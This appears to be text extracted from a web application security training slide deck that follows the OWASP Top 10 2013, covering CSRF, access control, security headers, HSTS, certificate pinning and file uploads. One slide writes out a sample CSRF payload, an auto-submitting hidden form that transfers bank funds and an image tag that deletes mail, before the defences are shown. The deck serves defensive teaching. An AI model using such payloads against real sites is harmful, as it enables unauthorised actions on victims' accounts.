  • 51. • Steps : – Go to “C:WindowsMicrosoft.NETFrameworkv4.0.30319” using command prompt. aspnet_regiis.exe -pe "connectionStrings" “<path of Web.Config>” • Decrypting the web.config – Go to the same path aspnet_regiis.exe -pd "connectionStrings" “<path of Web.Config>” Encrypting web.config
  • 54. OWASP Top 10 - 2013
  • 56. [8][8] <img src="https://google.com/logo.png"> <img src="https://google.com/deleteMail/7/confirm=true"> <form method="POST" action="https://mybank.com/transfer"> <input type="hidden" name="account" value="23532632"/> <input type="hidden" name="amount" value="1000"/> </form> <script>document.forms[0].submit()</script> Cross Site Request Forgery
  • 57. 57 How many are already “logged in”? Waiting to update your status, accept your credit card or email your friends What if another tab manages to send a request? What about others with the “remember me” checkbox? No need for tab to be open... just send a request and they'll happily accept! How many tabs on your browser?
  • 58. 58
  • 59. 59 Using fiddler we get the JSON
  • 60. 60
  • 61. 61
  • 62. 62 To add the anti-forgery tokens to a Razor page, use the HtmlHelper.AntiForgeryToken helper method: @using (Html.BeginForm("Manage", "Account")) { @Html.AntiForgeryToken() } This method adds the hidden form field and also sets the cookie token. <script> @functions { public string TokenHeaderValue() { string cookieToken, formToken; AntiForgery.GetTokens(null, out cookieToken, out formToken); return cookieToken + ":" + formToken; } } $.ajax("api/values", { type: "post", contentType: "application/json", data: { }, // JSON data goes here dataType: "json", headers: { 'RequestVerificationToken': '@TokenHeaderValue()' } }); </script> Anti-Forgery Tokens
  • 63. 63 void ValidateRequestHeader (HttpRequestMessage request) { string cookieToken = ""; string formToken = ""; IEnumerable<string> tokenHeaders; if (request.Headers.TryGetValues("RequestVerificationToken", out tokenHeaders)) { string[] tokens = tokenHeaders.First().Split(':'); if (tokens.Length == 2) { cookieToken = tokens[0].Trim(); formToken = tokens[1].Trim(); } } AntiForgery.Validate(cookieToken, formToken); }
  • 64. OWASP Top 10 - 2013
  • 65. if ((user.isManager() || user.isAdministrator() || user.isEditor()) && (user.id() != 1132)) { //execute action } How do you change the policy of this code? [7][7] Access Control
  • 66. • Authorization: The process where a system determines whether a specific user has access to a resource • Permission: Represents app behavior only • Entitlement: What a user is actually allowed to do • Principle/User: Who/what you are entitling • Implicit Role: Named permission, user associated – if (user.isRole(“Manager”)); • Explicit Role: Named permission, resource associated – if (user.isAuthorized(“report:view:3324”); What is Access Control
  • 67. • Hard-coded role checks in application code • Lack of centralized access control logic • Untrusted data driving access control decisions • Access control that is “open by default” • Lack of addressing horizontal access control in a standardized way (if at all) • Access control logic that needs to be manually added to every endpoint in code • Access Control that is “sticky” per session • Access Control that requires per-user policy Access Control DON'Ts
  • 68. • Vertical Access Control Attacks – A standard user accessing administration functionality • Horizontal Access Control Attacks – Same role, but accessing another user's private data • Business Logic Access Control Attacks – Abuse of one or more linked activities that collectively realize a business objective Attacks on Access Control
  • 69. • Loss of accountability – Attackers maliciously execute actions as other users – Attackers maliciously execute higher level actions • Disclosure of confidential data – Compromising admin-level accounts often results in access to user’s confidential data • Data tampering – Privilege levels do not distinguish users who can only view data and users permitted to modify data Impact of poor Access Control
  • 70. • Apache Shiro is a powerful and easy to use Java security framework • Offers developers an intuitive yet comprehensive solution to authentication, authorization, cryptography, and session management • Built on sound interface-driven design and OO principles • Enables custom behavior • Sensible and secure defaults for everything Apache SHIRO http://shiro.apache.org/
  • 71. Web Application needs secure access control mechanismWeb Application needs secure access control mechanism if ( currentUser.isPermitted( "lightsaber:wield" ) ) { log.info("You may use a lightsaber ring. Use it wisely."); } else { log.info("Sorry, lightsaber rings are for schwartz masters only."); } if ( currentUser.isPermitted( "lightsaber:wield" ) ) { log.info("You may use a lightsaber ring. Use it wisely."); } else { log.info("Sorry, lightsaber rings are for schwartz masters only."); } Problem Solution Solving real world Access Control problems
  • 72. int winnebagoId = request.getInt("winnebago_id"); if ( currentUser.isPermitted( "winnebago:drive:" + winnebagoId) ) { log.info("You are permitted to 'drive' the 'winnebago’. Here are the keys."); } else { log.info("Sorry, you aren't allowed to drive this winnebago!"); } int winnebagoId = request.getInt("winnebago_id"); if ( currentUser.isPermitted( "winnebago:drive:" + winnebagoId) ) { log.info("You are permitted to 'drive' the 'winnebago’. Here are the keys."); } else { log.info("Sorry, you aren't allowed to drive this winnebago!"); } Solving real world Access Control problems Web Application needs secure access to a specific objectWeb Application needs secure access to a specific object Problem Solution
  • 73. “GET” exposes sensitive authentication information in the URL In Web Server and Proxy Server logs In the http referer header         In Bookmarks/Favorites often emailed to others “POST” places information in the body of the request and not the URL Enforce HTTPS POST For Sensitive Data Transport 73 HTTP: POST vs GET [E1]
  • 74. » X-Frame-Options » X-XSS-Protection » X-Content-Type-Options » Content Security Policy » Access-Control-Allow-Origin » HTTPS Strict Transport Security » Cache-Control / Pragma HTTP Response Headers (security related)
  • 75. Protects you from most classes of Clickjacking X-Frame-Options: DENY X-Frame-Options: SAMEORIGIN X-Frame-Options: ALLOW FROM X-Frame-Options
  • 76. X-XSS-Protection Use the browser’s built in XSS Auditor X-XSS-Protection: [0-1](; mode=block)? X-XSS-Protection: 1; mode=block
  • 77. Fixes mime sniffing attacks Only applies to IE X-Content-Type-Options = ‘nosniff’ X-ContentType-Options
  • 78. • Anti-XSS W3C standard http://www.w3.org/TR/CSP/ • Move all inline script and style into external files • Add the X-Content-Security-Policy response header to instruct the browser that CSP is in use • Define a policy for the site regarding loading of content • Chrome version 25 and later (50%) • Firefox version 23 and later (30%) • Internet Explorer version 10 and later (10%) Content Security Policy
  • 79. Add the following as part of your HTTP Response Cache-Control: no-store, no-cache, must-revalidate Expires: -1 Disabling the browser cache
  • 80. [E2][E2]Application Layer Intrusion Detection • Great detection points to start with – Input validation failure server side when client side validation exists – Input validation failure server side on non-user editable parameters (hidden fields, checkboxes, radio buttons or select lists) – Forced browsing to common attack entry points e.g., /admin/secretlogin.jsp or honeypot URL (a fake path listed in /robots.txt)
  • 81. Application Layer Intrusion Detection • Others – Blatant SQLi or XSS injection attacks – Workflow sequence abuse (e.g. multi-part form in wrong order) – Custom business logic (e.g. basket vs catalogue price mismatch)
  • 82. OWASP AppSensor (Java) • Project and mailing list https://www.owasp.org/index.php/OWASP_ AppSensor_Project • Four-page briefing, Crosstalk, Journal of Defense Software Engineering • http://www.crosstalkonline.org/storage/iss ue-archives/2011/201109/201109- Watson.pdf
  • 83. [E3][E3]Encryption in transit • Confidentiality, Integrity (in Transit) and Authenticity – Authentication credentials and session identifiers must be encrypted in transit via HTTPS/SSL – Starting when the login form is rendered until logout is complete • HTTPS configuration best practices – https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sh eet • HSTS (Strict Transport Security) – http://www.youtube.com/watch?v=zEV3HOuM_Vw – Strict-Transport-Security: max-age=31536000 • Certificate Pinning – https://www.owasp.org/index.php/Pinning_Cheat_Sheet
  • 84. Strict-transport-security: max-age=10000000 Do all of your subdomains support SSL? Strict-transport-security: max-age=10000000; includeSubdomains Strict Transport Security (HSTS) protected void Application_BeginRequest(Object sender, EventArgs e) { switch (Request.Url.Scheme) { case "https": Response.AddHeader("Strict-Transport-Security", "max- age=31536000"); break; case "http": var path = "https://" + Request.Url.Host + Request.Url.PathAndQuery; Response.Status = "301 Moved Permanently"; Response.AddHeader("Location", path); break; } } // in global.asax
  • 85. • What is Pinning – Pinning is a key continuity scheme – Detect when an imposter with a fake but CA validated certificate attempts to act like the real server • 2 Types of pinning • Carry around a copy of the server’s public key; – Great if you are distributing a dedicated client-server application since you know the server’s certificate or public key in advance • Note of the server’s public key on first use (Trust-on-First-Use, Tofu) – Useful when no a priori knowledge exists, such as SSH or a Browser • https://www.owasp.org/index.php/Pinning_Cheat_Sheet Certificate Pinning
  • 86. File Upload Security • Upload Verification – Filename and Size validation + antivirus • Upload Storage – Use only trusted filenames + separate domain • Beware of "special" files – "crossdomain.xml" or "clientaccesspolicy.xml". • Image Upload Verification – Enforce proper image size limits – Use image rewriting libraries – Set the extension of the stored image to be a valid image extension – Ensure the detected content type of the image is safe • Generic Upload Verification – Ensure decompressed size of file < maximum size – Ensure that an uploaded archive matches the type expected (zip, rar) – Ensure structured uploads such as an add-on follow proper standard [E4][E4]